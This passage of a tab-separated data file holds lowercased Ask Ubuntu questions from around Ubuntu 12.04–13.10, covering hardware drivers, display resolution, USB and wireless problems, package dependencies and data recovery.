ii ) unloadmodule : `` evdev '' so up front it is talking to event6 , and apparently making a lot of reasonable decisions , particularly in treating the device as a touchscreen ( although it is actually pen-controlled ) . but for reasons unknown , it then attempts to access a /dev/input/js0 , which as far as i understand things would be a joystick-like device . there is no device node of that name on my system . on the other hand , since the message speaks about mtdev , it apparently is concerned with multi-touch as well . which makes a bit of sense : some of these devices ( and i believe the currently connected one is among them ) support the use of more than one pen . the reaction to this failed multi-touch / joystick initialization appears to be that the device is closed again , and not used at all . which i consider very unsatisfying . how do i tell evdev to neither use multi-touch nor joystick capabilities , but only the absolute coordinates event device ? edit 1 : according to the udev log , the devpath of this js0 device is /devices/pci0000:00/0000:00:12.0/usb6/6-2/6-2:1.0/input/input6/js0 . does nesting a js node inside a an input node make sense in this namespace ? where does udev get this idea from ? i guess i 'll try to write an udev rule to ignore that device , see if that works . edit 2 : i 've realized that evdev is dealing with two distinct devices , and if one fails , the other might still work . and in fact , at least on one run it did , despite js0 erors . not sure whether i forgot to actually test the device after reading the error message , or whether the working config depends on e.g . the order in which the devices are processed , which was different in the working run . but it is at least possible to get this to work sometimes . without button events so far , but that looks like a bug in the gtco kernel module . i 'd still like to understand where this js0 comes from and how to get rid of it .
388699	format impossible usb key 64go	i can not format my usb key drive . also my usb key is not shown . but when i use the program disk i can see it . i used disk app ubuntu and it show that i have no volume and no media on it : media - size - volumes ( nothing ) device dev/sdb contents - i can not format or do anything . how can i resolve this ?
388701	password protect a workspace	is there a way to password protect a workspace . so say workspace 1-3 are accessible and when you got to workspace 4 it asks for a password . why do i want to do this so i could leave a password protected fie and say a particular webpage open and even if i have not locked my computer if someone where to switch to that workspace they would require a password to see what was open in that workspace .
388702	why does files ( nautilus ) open a new window although there 's one already open ?	when i click on `` files '' in the launcher it opens another window although the normal action is to maximize the window already open . it does n't always do that . is it a bug ?
388703	screen resolution nomachine and navigation	i 'm having what seems to be a common problem using nomachine 3.5 - that when i connect to my remote machine the resolution is off . the remote box ( running ubuntu 12.04 , as is my client ) shows at a high resolution , and sometimes does not show icons at all let alone launchers . i have tried changing the resolution in the client configurations ( `` configure > general '' ) . this only works occaisionally however i am still unable to launch console or do a lot of the regular navigation . with my limited ubuntu ability and since i do n't know many keyboard short-cuts , i 'm wondering if there are any that would help me launch available applications in this case ? i can say that ctrl+alt+t does not work to launch a console remotely . it launches one on the client machine/locally instead . i can run xrandr by navigating to launch a console . i can occasionally do this . when i do i see the resolution of the remote machine is 1920 x 1080 . i change it to the resolution of my laptop which is 1600 x 900 but it does not change anything . i 'd also like to be able to solve the resolution issue because nothing seems to work . it seems really strange that sometimes desktop icons show up and sometimes they do n't . this might be related : i have also been having what i think are some graphics driver issues with ubuntu . i run two screens off my machine but some time ago after plugin the screen into a laptop , my desktop has not restored to being able to operate as dual screen . when i try to change the system settings to display as dual screen it only detects one screen .
388708	what may cause the desktop wallpaper to be scrambled ?	i have a very strange problem . sometimes when i work a long time with my laptop while the desktop is hidden a strange thing happens . i show the desktop and it is all scrambled . this problem is all the stranger since it happens only sometimes and i did not have it always . how can i diagnose whether it is a hardware or software problem ? has anyone had similar symptoms ? edit : this problem persists after upgrading to 13.10 . when the wallpaper gets scrambled and i change it to a different one and then back again , it seems fixed for a while . does this fact indicate that it is not a hardware problem ? edit2 : now this happens also for some windows , not just the desktop .
388710	fix case sensitive url	i have been doing some work on my localhost with xampp and i have a link that looks like this http : //localhost/example and another one called http : //localhost/example the actual folder name is called example in lower case but either one works . however i have moved the files onto a ubuntu aws instance and it does n't work there . what do i need to do to handle urls so they are n't case sensitive in ubuntu ?
388711	apt-get update command in ubuntu 12.04	we have installed ubuntu server 12.04 . we upgraded it with the command apt-get upgrade but when it comes to apt-get update , it stuck and can not find the exact header . secondly virtinst command does not run . how can we resolve this issue ?
388713	uninstall ubuntu 13.04 not dual partitioned	really struggling to get my head around ubuntu after using windows before and think there is a fault on ubuntu software also as have these strange lines / cracks appearing on screen when i 'm on it . anyhow , i 'm trying to delete , restore factory settings or whatever it takes for me to be able to run on windows instead . i had upgraded my motherboard to a a85xm-a while installing ubuntu and it did n't give me the option of partitioning as said no os found so have n't been able to follow the other how to guides . when i install my recovery disk for windows vista it wo n't recognise the computer saying not asus help ! ! ! what do i do please ? thanks kerry
388715	header files in anjuta	what is used instead of header in anjuta for a simple c program to give an output ? i am new to programming and only used turbo c previously . thanks in advance .
388718	problem with usb 3.0 on hot power off in 13.04	when i power off computer via poweroff command , usb 3.0 devices are correctly restored on the next boot , but when computer lose power , usb 3.0 devices are not visible after boot in output of lsusb or dmesg command . usb 3.0 devices becomes visible only after physical reconnect of usb 3.0 wire . enviropment : ubuntu 13.04 , kernel - linux user-ms-7851 3.11.0-031100-generic # 201309021735 smp mon sep 2 21:36:21 utc 2013 x86_64 x86_64 x86_64 gnu/linux is there any way to force rescanning or reloading devices on usb 3.0 bus ?
388721	difficulties when installing miningbeast bitcoin miner	i downloaded and installed the software using a standard packager on ubuntu 12.04 , but when launching i 've got the following error : file `` /opt/bitcoin/miner/env/bin/run.py '' , line 5 , in < module > from pkg_resources import load_entry_point file `` /opt/bitcoin/miner/env/lib/python2.7/site-packages/setuptools-0.6c11-py2.7.egg/pkg_resources.py '' , line 698 , in < module > file `` /opt/bitcoin/miner/env/lib/python2.7/site-packages/setuptools-0.6c11-py2.7.egg/pkg_resources.py '' , line 701 , in environment file `` /opt/bitcoin/miner/env/lib/python2.7/site-packages/setuptools-0.6c11-py2.7.egg/pkg_resources.py '' , line 96 , in get_supported_platform file `` /opt/bitcoin/miner/env/lib/python2.7/site-packages/setuptools-0.6c11-py2.7.egg/pkg_resources.py '' , line 221 , in get_build_platform importerror : no module named util it seems to work well on ubuntu 13.04 . any ideas ?
388722	booting windows from inside ubuntu	my laptop has pre-installed windows 8 . i want to install ubuntu 13.10 alongside it . now i want only one boot option that is - ubuntu . i want to be able to boot windows 8 only from inside ubuntu ( through terminal , most preferably ) . is there any way to do this ?
388724	web hosting management package	i want to host multiple domains on my ubuntu vm . is there any package like lamp to handle dns , email , apache and other needed softwares for a web server ? i 'm looking for a software like plesk and cpanel . but an opensource one .
388727	problem with virtual desktop in wine	i got an issue with the virtual desktop for my wine installation . when is set the resolution for it window size for the width never becomes bigger than 800 px . the actual size of the desktop seems to be bigger though since games identify it correctly resulting in warped images when they are run in full screen . changing the resolution in a game ( been using sky drift ) to a different resolution and back again sets the window to a correct size . i have tried different versions of wine , at the moment 1.7.8 . my ubuntu version is 13.10 edit : important details i did n't have time to file . i 'm using playonlinux 4.2.1-1 and configure the resolution of the virtual desktop using the `` configure wine '' tool .
388729	how do i completely remove lazreport ?	i have a standard user account in addition to the admin account on 12.04 deskop . i have lazarus + lazreport component added to it . due to a bug i can not trace , i 'm trying to remove lazreport . i tried using the standard feature of uninstalling and reinstalling lazreport using the ide but i can not get rid of the error . i think there is a trace of lazreport even after it 's removed . my requirement : i want to completely remove every trace of lazreport ( not lazarus ) . how do i do this ? thanks ! edit : about lazreport ... it is a 'component ' added onto the lazarus ide . on the ide , i go to 'package ' > 'open package file ' > open the lazreport pacakge > 'install' then after the installation , the ide is rebuilt ( automatically ) and restarted . the same procedure is used to remove it . but i 'm concerned if there are still traces of it .
388732	virtualization on linux server	in my office we 've just purchased two new servers , which will be ubuntu linux servers , and we are going to be completely virtualizing our environment . i have a bootable usb with esxi 5 on it , does anyone have any tips on how to get the virtual machines installed on a linux machine ? this is something that i 've never done before !
388734	error while installing on windows7	i am trying to dual boot ubuntu on windows 7 and when i hit install ubuntu along side windows 7 it 's just terminating all the installation process and when iam trying for something else it says that like ( error due to root )
388735	how to recover deleted ntfs patition with data entirely while installing ubuntu 13.04	i 've installed ubuntu 13.04 onto my hp 2231tx computer . during installation all of my data was erased . i did n't know all of my three partitions would be deleted . i was shocked after finding out that all of my personal data was erased . i did n't know what to do to resolve this problem so i search google for an answer . i found a program called testdisk and i used it to recover about half of my data . among this data were n't my personal photos and videos . is there a way to recover the other half ?
388737	i have installed 13.10 but it is not showing wifi	i have installed ubuntu 13.10 but to connect to the net i have tried both wired and wifi but it is not showing wifi at all and for wired connection it is not connecting ( not showing those arrows up & down ) , generally in windows i used to set up a new connection and then i used to enter username and password so every time when i need net please tell me how to get rid of this .
388739	is toshiba l50-a-1cu compatible with ubuntu ?	i am about to buy a toshiba l50-a-1cu laptop , but unfortunately it runs windows 8 and it is not in the official ubuntu compatibility list . actually , toshiba disappeared from the list completely . could someone confirm if toshiba l50-a-1cu is compatible with ubuntu ?
388747	grub and login screen low resolution ubuntu 13.10	hi i have a problem with my grub and login screen . resolution is very low , but when i log in my resolution is ok ( 1920x1080 ) . i tried this how do i safely change grub2 screen resolution ? but with no result . what is going on ?
388748	i ca n't compile source , make does n't work	i am trying to install `` somagic easycap dc60 '' device driver step by step from a guide . i 'm in the unpacked folder in terminal , but make does n't work . it says : me @ me-pc : ~/desktop/somagic-easycap_1.1 $ make cc -s -w -wall somagic-init.c -o somagic-init -lusb-1.0 -lgcrypt make : cc : command not found make : *** [ somagic-init ] error 127 i tried sudo make but it 's the same . all dependencies and packages are installed that the guide says . here is the guide : http : //code.google.com/p/easycap-somagic-linux/wiki/gettingstarted # somagic-capture_debian_package
388749	indicator , notifier and blocker of internet traffic	which traffic monitor applications currently available can do the following things ? ( or some of them , in the worst case ) start recording how much internet data is downloaded and uploaded with a connection managed by ubuntu 's default network manager show the current amount of traffic reached since that date and time by an indicator in the notification area ( right part of the unity top panel ) and by an equivalent element in kde notify with a pop-up message or similar method each time a user-defined amount of traffic has been reached ( for example every 500 megabytes ) set in a `` pause '' condition the internet activity if a user-defined amount of traffic has been reached ( i.e . the connection is kept on ) i 'm using ntm but it 's limited : it records and shows the current amount of traffic in a floating window , not in the notification area ; it notifies basing on time periods , not on data amounts ; it ca n't pause the internet activity . thank you for your help .
388753	right version of ubuntu	my parents have just given my their old laptop ; it has a jawdropping 500mb of ram and a 1.4 ghz processor . is there a version of ubuntu that would function well on it ? cheers
388756	how to resolve jira url redirect	i 'm having some trouble trying to figure out how to create a rewrite url , or .htaccess in apache2 i 've created a redirect rule at my dns zone : jira.xyz.co redirect http : //xx.xxx.xx.xx:8080/jira the redirect works and it takes me to the jira server , iâm trying to figure out for the redirect to have the below view when the users type : jira.xyz.co to forward them to the below link , not to display the ip address . http : //jira.xyz.co/jira/secure/dashboard.jspa how can i resolve this issue ?
388758	ca n't boot live-cd after windows 8.1 pro upgrade	i have a toshiba x75-a7298 laptop . i tried to install ubuntu when i was still using windows 8 . at that time the livecd worked to some degrees . however , i upgraded my system to windows 8.1 pro . i knew that i would have some issues with uefi and nvidia optimus gpu . now the live-cd does n't work anymore . can someone help me out ?
388760	skype on hp envy m6 sleekbook has no sound	there is no sound with skype on my new hp envy m6 sleekbook . i tried all permutations and options offered . no luck . this makes skype unusable with ubuntu and ubuntu not as attractive to use as it should be . any suggestions ? michael .
388765	dell latitude e6540 resume crash with catalyst drivers	i have a dell latitude e6540 with an amd radeon hd 8790 and an integrated intel gpu . i installed amd catalyst 3.11 beta v9.4 drivers in ubuntu 13.10 . it 's works fine but suspend/resume does n't work . it suspends but crashes when resuming . is this a known problem ? is there a solution ? thanks in advance !
388768	lvs support lts 12.04	does lts 12.04 have lvs support built into kernel ? when i installed keepalived package i got this error : kernel does not support ipvs ipvsadm requires ipvs support in the kernel . please use a kernel with ipvs modules , otherwise this software is pretty useless . anyone idea ? thanks
388773	i want to install freeglut3-dev package but this install removes the xserver ( raring ) without which my system ca n't run	as mentioned in the title i want to install the freeglut3-dev library on my system in order to build an ( ids camera ) example application this requires the qtopengl and gl libraries . but when i install the freeglut3-dev package it automatically removes the xserver related packages . in essence , xserver-xorg-lts-raring , xserver-common-lts-raring and xorg . this causes the ( graphical ) boot of my system to crash . i can then only fix this by re誰nstalling the xserver ( raring ) related packages . but this then removes freeglut3-dev again . addition : i found that i also need libqt4-opengl which gives me the same problem . how can i get both packages ? ps i installed bumblebee and have to boot using nomodeset
388780	visual basic alternative for ubuntu ?	i used visual basic on windows just to make the design of programs , no codding . but i ca n't find any alternative despite gambas and mono : /
388781	how are a debian package 's dependencies handled when it requires `` package a or package b '' for dependencies ?	in ubuntu 12.04 ( and debian and the other ubuntu versions ) , the nginx meta-package has dependencies listed on nginx-full or nginx-light . what is the rule of which of those dependencies the system will try and install first ? or is it just random ?
388782	how to use evince to loop over ps files in current folder ?	i love evince , i use it as an image viewer of my eps figures ( a one-page document ) . it 's super light-weight and clean . i also like how it re-renders the ps documents as you zoom-in and zoom-out , this feature is missing from other image viewers . the problem is that evince can only open one file/image at each time , this is very annoying , the next button only works for next page , it does not work to search for the next ps/eps file in the current folder . any ideas ?
388788	where i can check the roadmap/vision development for any ubuntu application ?	ubuntu software center is supposed to replace several utilities provided by other piece of software as can be seen in the rationale , but i ca n't find equivalent functionality in ubuntu software center . where i can find the development plans of ubuntu software center and any other packages included in ubuntu ?
388790	installing steam caused 13.10 to no longer boot	i 'm running ubuntu 13.10 on an i7 laptop with 12 gb of ram and an ati graphics card . while perusing the software center i noticed that steam was available to download and install . this seemed interesting , so i did so . during the install , steam indicated that the ati drivers were n't installed and this might cause some performance problems . however , the next time i tried restarting the computer , the system will no longer boot . grub comes up and i select ubuntu 13.10 but then after looking like it is going to boot it goes to a blank , black screen and does nothing . can someone point me in the right direction here . i just want to get back to where i was before . how to resolve this ?
388791	preventing app windows from changing workspaces when screen resolution changes	i 'm on ubuntu 12.04.3 lts i have a dell laptop with resolution 1400x900 attached to an external monitor with resolution 1920x1080 . when i attach to the external monitor i close the laptop lid and shut off the display there , and use the 1920x1080 resolution on the external . currently i have one row of 5 workspaces . like many users , i like specific apps to be in specific workspaces . web browser in workspace one , code ide in workspace 2 , terminals tailing log files in workspace 3 , etc . when i detach my laptop from the external monitor and open the laptop lid , the laptop screen becomes the active display with resolution 1400x900 , and the workspace of all my apps has changed . most of them have moved to workspace 1 . is there a way to prevent this from happening ?
388793	installing ubuntu on old laptop with no cd drive	i 'm not even sure if this is possible , but i 'd like to install ubuntu on an old laptop . problem is , the cd drive is broken , and the laptop will not boot from usb . it used to run windows xp but that crashed and will not boot at all . a friend suggested that it might be possible to detach the internal hd , plug it into my desktop pc ( which runs ubuntu ) and put the correct files on to it . then i could reattach it to the laptop and boot from the internal hd . i 'd like to know if this is possible , and what files i would need to download in order to do this .
388795	fix my read-only pen drive to read and wirte	my 8 gb pen drive has suddenly change into read-only . in fact 2 pen drives have changed into read-only . i do n't know about how the first pen drive changed into read-only , but with the second pen drive i tried to make a bootable pen drive using the start up disk creator . in the middle of writing suddenly it shows some error . after this i could n't copy any file to pen drive or delete any file from the pen drive anymore . i have tried many methods , but i ca n't make it read-write . i need to fix it . please help me to do this . also i need to format the pen drive after fixing it . this error shows when it trying to delete any file in the pen drive .
388798	keyboard shortcut for always on top	in ubuntu 13.10 ( unity desktop environment ) there are keyboard shortcut like ctrl + super + up to maximize the windows etc . is there any keyboard shortcuts for always on top ? if not how can make my own custom shortcut for the same using the ubuntu system setting ?
388799	can not connect to eth0	alright , so a little history . i originally had realtek r8169 driver for my ethernet . however , whenever i tried to connect to the wired internet , it would tell me i was connected , but the internet would not work . i looked around for answers , and i got a consistent solution to the problem was to download and install the r8168 driver . i tried that , but now my ethernet is unclaimed , and i do n't know what to do . here are some relevant outputs : sudo lshw -c network *-network unclaimed description : ethernet controller product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list configuration : latency=0 resources : ioport:2000 ( size=256 ) memory : d0010000-d0010fff memory : d0000000-d000ffff memory : d0020000-d002ffff sudo lspci -v 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) subsystem : hewlett-packard company device 1444 flags : bus master , fast devsel , latency 0 , irq 10 i/o ports at 2000 [ size=256 ] memory at d0010000 ( 64-bit , prefetchable ) [ size=4k ] memory at d0000000 ( 64-bit , prefetchable ) [ size=64k ] expansion rom at d0020000 [ disabled ] [ size=64k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 01 capabilities : [ ac ] msi-x : enable- count=2 masked- capabilities : [ cc ] vital product data capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 00-00-00-00-00-00-00-00
388800	how do i set a password for guest login ?	i 'd like to set a password for the guest account . how can i do this ? ( this question is not answered under the similar question in this forum , see below . ) the last time this was asked on this forum it was suggested that there was no reason to set a password on guest as it was equivalent to set up a new , regular account with a password . it seems to me that this is not the same thing . the guest account is secure by default , limits access to the file system and is self-cleaning , regular accounts are not . by self-cleaning i mean that it leaves no loose files , no internet history , no potential viruses ( i know , linux has none ) , etc . since it all takes place in temporary space . it is good to have the guest account protected , too , in some situations . for example , if you live in a group house and have a common computer you may want to share freely with people you know but otherwise limit expensive internet access . not everyone has the same situation . one suggestion last time was to `` open a terminal ... then type passwd and the user name . so it should be passwd guest '' this did n't work in my hands , even with sudo . linux replied `` user 'guest ' does not exist '' am i doing something wrong ? if ubuntu is not designed to allow a password on the guest account then , in the spirit of linux , if you think this is a reasonable thing to do , let 's look for a workaround . anyone ? ( i 'm a newbie , so let me know where i 'm being naive . )
388803	how to understand / be aware of ubuntu bug fixes ?	where can i follow non-technical release notes on ubuntu bug fixes ? the notes in updates available are quite abstruse to me , while i do want to know whether there will be bug fix for things like suspend in ubuntu 12.04 . an example for comparison is whenever there 's a major bug in windows / apple ( e.g . recent macbook air 's camera malfunction ) , the tech news is all over it and when there 's a bug fix come out , it 's very easy for me to know .
388809	if i choose to try ubuntu can i save anything i download ?	i have recently installed ubuntu to a usb as a portable os , however i was wondering what would happen when i choose to install something on ubuntu without actually installing ubuntu on my pc , would the installed file save upon shutting down my pc ? or would it be removed ?
388810	how to install ubuntu on android tablet	how can i install ubuntu on samsung tablet or any android tablet.please answer in detail . it would be appreciated if done by video or any easy method .
388815	external subwoofer	i just purchased an asus q550lf-bbi7 laptop that came with an external sonicmaster subwoofer . i do n't think the subwoofer is working . i plug it in to the correct jack & nothing happens . what should happen ? how do i get this to work ?
388816	how to open folders in new window by default ubuntu 1310	how to make by default open in new window for folders ubuntu 1310 please i 'm unable to configure folder options
388820	quick access to /usr/share/applications	i 'm a linux newbie , just installed ubuntu yesterday as a matter of fact . i love it . but i do have one question . is there a way to get to /usr/share/applications faster than having to go through the filesystem ? i tried making a hard link to it , but for some reason it wo n't let me .
388822	install ubuntu on external usb 3.0	i´m trying to install ubuntu on an external hd 3.0 of 1tb , uefi , but i have some issues . so anyone have already done this ? i´m pretty sure yes , so can you help me with my situation . thank you so much ! the problem seem to be the hard disk , but the hd is new .
388829	wireless is disabled in 12.04 ubuntu	when i installed ubuntu it used to show wireless network but could not connect . today i tried to reinstall the driver ralink rt3290 and made all the reqd changes it showed an error and it is not even showing wireless networks please help ... .
388832	why i can not unmout partitution , and why it is busy	i accidentally deleted whole documents folder . i want to use extundelete to recover it . as a ubuntu virgin i spend an hour to correctly write command : sudo extundelete /dev/sda6 -- restore-directory home/ladislav/dokumenty ladislav @ ladislav : ~ $ sudo extundelete /dev/sda6 -- restore-directory home/ladislav/dokumenty warning : extended attributes are not restored . warning : ext3_feature_incompat_recover is set . how can i fix this ? the partition should be unmounted to undelete any files without further data loss if the partition is not currently mounted , this message indicates it was improperly unmounted , and you should run fsck before continuing . if you decide to continue , extundelete may overwrite some of the deleted files and make recovering those files impossible . you should unmount the file system and check it with fsck before using extundelete . when i try to unmount it , the answer is busy ... ladislav @ ladislav : ~ $ sudo umount /dev/sda6 umount : / : device is busy . ( in some cases useful info about processes that use the device is found by lsof ( 8 ) or fuser ( 1 ) ) would you like to continue ? ( y/n ) y loading filesystem metadata ... 344 groups loaded . loading journal descriptors ... 30498 descriptors loaded . searching for recoverable inodes in directory home/ladislav/dokumenty ... 3300 recoverable inodes found . looking through the directory structure for deleted files ... 3300 recoverable inodes still lost . no files were undeleted . what am i doing wrong ? ... except from not keeping backup for my data ?
388833	how to run bash script in upstart conf file ?	i made bash script `` kvm_manage '' . how should i write .conf script and run my bash script inside ? it is possible ? i am beginner..
388836	how do i get the source code for just the ext4 file system on a windows machine ?	i 'd like to get the source of the just the ext4 file system , but from on a windows machine . at the moment i 've navigated to http : //archive.ubuntu.com/ubuntu/dists/saucy/ , but everything i 've found does n't make sense , and what i 've downloaded thus far has been files with listings in them and such . what 's the easiest way to get the source code for the file system that ubuntu is based on ?
388838	create vpn in ubuntu 12,04	i want to share local intranet in our college with a friend who is sitting at a remote location . is there any way to go about . i dont particularly understand vpn well . do i have to pay something for vpn service ? is n't it possible to share the local intranet with only one particular remote ip in any way ?
388839	disabling suspend/sleep/hibernate on a headless xubuntu	i 'm running xubuntu 13.10 headless via ssh and tmux . whenever i leave the machine , making sure to have a tmux session opened , it will invariably crash after about an hour . the sign it has crashed is that top says that xorg is hogging 99 % cpu . as the machine is headless , i can not do the simple xset -dpms that has been suggested many times already . how do i remove every power saving feature that could put the computer to sleep/suspend/hibernate mode when running headless ?
388844	configuring a strictly local dns server for local network media streaming	i am fairly new to linux , but i have an ubuntu media server set up in my house . we ca n't afford to have an internet connection , so i move the server back and forth occasionally when i need to run updates or install new software . i am running plex media server on ubuntu , and i currently have a macbook that accesses the server with ease . however , my other devices ( ps3 , wd media streaming box ) can see the server , but they can not access the files and they both chock it up to a dns error . what dns configurations do i need to make in bind9 to get all of this straightened out ? or could it possibly be a firewall issue ? thanks in advance , i hope i can get some answers on this .
388845	semp toshiba aurex wireless problem	i 've just bought a semp toshiba aurex notebook is 1817hd , intel i5 / 4gb ram / 2 x 750 g sata ii , supports raid 0 and 1 / ati radeon hd 5650 gpu with 2gb ddr3 ram / wi-fi 802.11 b/g/n , realtek 10/100/1000 mbps ethernet adapter . i formatted and installed ubuntu 13.10 in one of the hard drives ( the other i use as a partition for files ) , and even though the wireless worked perfectly at first , after a couple of days it stopped working . ubuntu wo n't even recognize it . i 've been googling for a solution , but it 's no use , i have n't been able to find anything helpful that actually works . does anybody have any tips on this ? any help will be greatly appreciated ! carlos @ toshiba : ~ $ sudo lshw -class network [ sudo ] password for carlos : *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 06 serial : 00:14:0b:6f:37:31 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:6000 ( size=256 ) memory : f0d04000-f0d04fff memory : f0d00000-f0d03fff carlos @ toshiba : ~ $ lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 18 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 06 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 ide interface : intel corporation 5 series/3400 series chipset 4 port sata ide controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.5 ide interface : intel corporation 5 series/3400 series chipset 2 port sata ide controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 02:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] madison [ mobility radeon hd 5650/5750 / 6530m/6550m ] 02:00.1 audio device : advanced micro devices , inc. [ amd/ati ] redwood hdmi audio [ radeon hd 5000 series ] 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) carlos @ toshiba : ~ $ dmesg | grep -i firmware [ 0.255779 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored rfkill list all ( no results ! ! ! ! ! ! ! ! )
388846	i 'm running android 4.3 on virtual box in ubuntu 13.10 , could it harm my pc or disc ?	i have that doubt , 'cause i think android is made for ssd and mine is hdd . i 'm doing it for being able to run whatsapp , it appears to work fine , do you think that when ubuntu touch will be running whatsapp we will be able to run it on ubuntu pc too ? thanks a lot .
388847	how to disable certain keyboard shortcuts in gnome ?	i 'm using us ( dvorak ) keyboard layout , everything is working without problems . the problem come few days ago , when i type , there is something wrong with the keyboard shortcut , when i press ctrl + a it was n't selecting all text but it just go to the start of the line , ctrl + f make it go forward to the next character , ctrl + h is a backspace , it is like shortcut on a bash prompt . the problem comes when i type in all applications such as gedit , firefox , and other applications . how do i fix it ?
388850	idle 2.7.5+ does n't work in ubuntu 13.10	recently , after upgrade from ubuntu 13.04 to 13.10 i can open .py files in idle 2.7 . when i doing click in `` file - rencet files - file.py '' i get a empty windows . in this windows the code is absent and i ca n't close it normally , just via `` pkill idle '' in the terminal . when i try to open the file.py via terminal with idle : idle path_to_file/file.py i get : traceback ( most recent call last ) : file `` /usr/bin/idle '' , line 5 , in < module > main ( ) file `` /usr/lib/python2.7/idlelib/pyshell.py '' , line 1536 , in main if flist.open ( filename ) is none : file `` /usr/lib/python2.7/idlelib/filelist.py '' , line 36 , in open return self.editorwindow ( self , filename , key ) file `` /usr/lib/python2.7/idlelib/pyshell.py '' , line 131 , in __init__ editorwindow.__init__ ( self , *args ) file `` /usr/lib/python2.7/idlelib/editorwindow.py '' , line 323 , in __init__ io.loadfile ( filename ) file `` /usr/lib/python2.7/idlelib/iobinding.py '' , line 258 , in loadfile chars = self.decode ( chars ) file `` /usr/lib/python2.7/idlelib/iobinding.py '' , line 296 , in decode enc = coding_spec ( chars ) file `` /usr/lib/python2.7/idlelib/iobinding.py '' , line 129 , in coding_spec for line in lst : nameerror : global name 'lst ' is not defined i need help , i ca n't work with my .py files in idle ! ! ! thanks and best wishes to all .
388851	ubuntu lock screen does n't stay blank ?	when i lock my ubuntu 12.04 screen with ctrl + alt + l , the screen goes blank ( as it should ) and in 30 seconds , the login prompt is shown again . then `` session expired '' message is seen and it goes blank again . it repeats . what should i do to fix this ? ( i just want it to stay blank until i move my mouse and press something on my keyboard ) i read here : that it may caused because of vlc . but i did that fix , but it did n't help . which other app might be causing this ?
388854	how to burn mp3 audio files to cd using brasero in ubuntu 13.10 ?	i have been trying to burn a list of mp3 songs to a disk using the brasero disk burner . i am using ubuntu 13.10 . however , the burn is immediately stopped with the error message saying gstreamer encountered a general stream error . here is the relevant part from the error log : ... . braseronormalize new decoded pad linked braseronormalize gstbaseparse.c ( 3188 ) : gst_base_parse_loop ( ) : /gstpipeline : pipeline25/gstdecodebin : decodebin13/gstmpegaudioparse : mpegaudioparse25 : streaming stopped , reason error braseronormalize called brasero_job_error braseronormalize finished with an error braseronormalize asked to stop because of an error error = 1 message = `` gstreamer encountered a general stream error . '' braseronormalize stopping session error : gstreamer encountered a general stream error . ( brasero_burn_record brasero-burn.c:2856 ) any ideas how to fix this problem ?
388856	unity works wrong after installing other des	i have installed the lxde , kde , and gnome environments besides unity , and also their login managers . it worked all fine , but after a while , unity starts to use the lxde icons in the panel at the top , and the menus are somehow smaller ( see the screen shot ) . does anybody know why this is happening or what i can do ?
388858	unmet dependancy that seems impossible to fix as system is stuck in a loop ( to do with acroread )	i need to install acro-bin to sort out a dependency issue and have followed the amazingly detailed advice on the unmet dependencies thread ( how do i resolve unmet dependencies ? ) but still no luck . this is the error message i keep getting ... .. unpacking acroread-bin ( from ... /acroread-bin_9.5.5-1precise1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/acroread-bin_9.5.5-1precise1_i386.deb ( -- unpack ) : trying to overwrite '/opt/adobe/reader9/reader/intellinux/mozilla/prefs.js ' , which is also in package adobereader-enu 9.5.5 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/acroread-bin_9.5.5-1precise1_i386.deb error in function : dpkg : dependency problems prevent configuration of acroread : acroread depends on acroread-bin ; however : package acroread-bin is not installed . dpkg : error processing acroread ( -- configure ) : dependency problems - leaving unconfigured it happened when i added the bit needed to get tab menus to be readable in adobe i think . any suggestions gratefully received , thanks in advance .
